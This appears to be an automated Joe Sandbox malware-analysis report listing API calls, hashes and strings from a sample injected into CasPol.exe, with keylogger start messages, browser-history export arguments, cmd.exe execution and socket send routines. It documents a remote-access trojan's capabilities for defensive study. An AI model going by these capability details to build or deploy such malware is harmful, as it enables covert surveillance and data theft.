                                                                                                            • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                              • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                            • String ID:
                                                                                                            • API String ID: 4269425633-0
                                                                                                            • Opcode ID: 0d775c34279de42def04f5e4a5f6fbb11c5f8ae86916d795950b7c30c7907390
                                                                                                            • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                                                            • Opcode Fuzzy Hash: 0d775c34279de42def04f5e4a5f6fbb11c5f8ae86916d795950b7c30c7907390
                                                                                                            • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
                                                                                                            • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                            • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                                                            • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                            • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
                                                                                                            • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
                                                                                                            • __freea.LIBCMT ref: 0044FFC4
                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                            • String ID:
                                                                                                            • API String ID: 313313983-0
                                                                                                            • Opcode ID: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                                                            • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                                            • Opcode Fuzzy Hash: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                                                            • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                                            APIs
                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                                            • _free.LIBCMT ref: 0044E1A0
                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 336800556-0
                                                                                                            • Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                                            • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                                            • Opcode Fuzzy Hash: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                                            • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(00434403,00434403,?,00445359,00446B42,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?), ref: 00446F48
                                                                                                            • _free.LIBCMT ref: 00446F7D
                                                                                                            • _free.LIBCMT ref: 00446FA4
                                                                                                            • SetLastError.KERNEL32(00000000,?,00434403), ref: 00446FB1
                                                                                                            • SetLastError.KERNEL32(00000000,?,00434403), ref: 00446FBA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 3170660625-0
                                                                                                            • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                            • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                                                            • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                            • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 0044F7B5
                                                                                                              • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                            • _free.LIBCMT ref: 0044F7C7
                                                                                                            • _free.LIBCMT ref: 0044F7D9
                                                                                                            • _free.LIBCMT ref: 0044F7EB
                                                                                                            • _free.LIBCMT ref: 0044F7FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                            • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                                            • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                            • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00443305
                                                                                                              • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                            • _free.LIBCMT ref: 00443317
                                                                                                            • _free.LIBCMT ref: 0044332A
                                                                                                            • _free.LIBCMT ref: 0044333B
                                                                                                            • _free.LIBCMT ref: 0044334C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                            • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                                            • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                            • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                                                            APIs
                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                            • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                            • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                            • String ID: (FG
                                                                                                            • API String ID: 3142014140-2273637114
                                                                                                            • Opcode ID: 6c16c17156e3f772358f7467e06c9b2cfcef92d79dd8da7b0064c4f82c90d24e
                                                                                                            • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                                            • Opcode Fuzzy Hash: 6c16c17156e3f772358f7467e06c9b2cfcef92d79dd8da7b0064c4f82c90d24e
                                                                                                            • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                                            APIs
                                                                                                            • _strpbrk.LIBCMT ref: 0044D4A8
                                                                                                            • _free.LIBCMT ref: 0044D5C5
                                                                                                              • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,00434403,?,?,?,00434403,00000016,?,?,0043A833,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                                                                                              • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417,?,00434403), ref: 0043A878
                                                                                                              • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000,?,00434403), ref: 0043A87F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                            • String ID: *?$.
                                                                                                            • API String ID: 2812119850-3972193922
                                                                                                            • Opcode ID: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                                                                                                            • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                                                                            • Opcode Fuzzy Hash: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                                                                                                            • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                                                                            APIs
                                                                                                            • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                              • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                              • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                              • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                            • String ID: XCG$`AG$>G
                                                                                                            • API String ID: 2334542088-2372832151
                                                                                                            • Opcode ID: ce0f8d336d2a156708e4fb79cc9eb4dc9fb8683efa97e21ee82fd6c7139a85ed
                                                                                                            • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                                            • Opcode Fuzzy Hash: ce0f8d336d2a156708e4fb79cc9eb4dc9fb8683efa97e21ee82fd6c7139a85ed
                                                                                                            • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00442714
                                                                                                            • _free.LIBCMT ref: 004427DF
                                                                                                            • _free.LIBCMT ref: 004427E9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$FileModuleName
                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                            • API String ID: 2506810119-3657627342
                                                                                                            • Opcode ID: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                                                            • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                                            • Opcode Fuzzy Hash: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                                                            • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                              • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                            • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                            • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                            • API String ID: 368326130-2663660666
                                                                                                            • Opcode ID: c4263464be22f02838b4d8536b2b9f3deae672e2af24e6496d28b6afc4a6d1c8
                                                                                                            • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                                                            • Opcode Fuzzy Hash: c4263464be22f02838b4d8536b2b9f3deae672e2af24e6496d28b6afc4a6d1c8
                                                                                                            • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                                                            APIs
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
                                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread$LocalTimewsprintf
                                                                                                            • String ID: Offline Keylogger Started
                                                                                                            • API String ID: 465354869-4114347211
                                                                                                            • Opcode ID: 37852cb36ddf9343104c0579adaedb1d6044286f869547d9c6730b709b6f6d7f
                                                                                                            • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                                                            • Opcode Fuzzy Hash: 37852cb36ddf9343104c0579adaedb1d6044286f869547d9c6730b709b6f6d7f
                                                                                                            • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread$LocalTime$wsprintf
                                                                                                            • String ID: Online Keylogger Started
                                                                                                            • API String ID: 112202259-1258561607
                                                                                                            • Opcode ID: cb4b4d00bd1f48587d0ff016746fdd274eca288aaf42b5913708234c7b45ab26
                                                                                                            • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                                                            • Opcode Fuzzy Hash: cb4b4d00bd1f48587d0ff016746fdd274eca288aaf42b5913708234c7b45ab26
                                                                                                            • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                                                            • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                                                            • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                            • String ID: `@
                                                                                                            • API String ID: 2583163307-951712118
                                                                                                            • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                            • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                                                            • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                            • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEventHandleObjectSingleWait
                                                                                                            • String ID: Connection Timeout
                                                                                                            • API String ID: 2055531096-499159329
                                                                                                            • Opcode ID: 6ad77e449ea0c8f5081632a4e06be94507840fe6c7293467847821b6de829208
                                                                                                            • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                                                            • Opcode Fuzzy Hash: 6ad77e449ea0c8f5081632a4e06be94507840fe6c7293467847821b6de829208
                                                                                                            • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                                                            APIs
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                              • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                                              • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                            • String ID: bad locale name
                                                                                                            • API String ID: 3628047217-1405518554
                                                                                                            • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                            • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                                                            • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                            • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                                                            APIs
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExecuteShell
                                                                                                            • String ID: /C $cmd.exe$open
                                                                                                            • API String ID: 587946157-3896048727
                                                                                                            • Opcode ID: 7d804f516a62bf7a6255b3e0914bf23257692c2765e93924c49a27dcea95556c
                                                                                                            • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                            • Opcode Fuzzy Hash: 7d804f516a62bf7a6255b3e0914bf23257692c2765e93924c49a27dcea95556c
                                                                                                            • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                            APIs
                                                                                                            • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                            • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                            • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: TerminateThread$HookUnhookWindows
                                                                                                            • String ID: pth_unenc
                                                                                                            • API String ID: 3123878439-4028850238
                                                                                                            • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                            • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                            • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                            • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                            • String ID: GetLastInputInfo$User32.dll
                                                                                                            • API String ID: 2574300362-1519888992
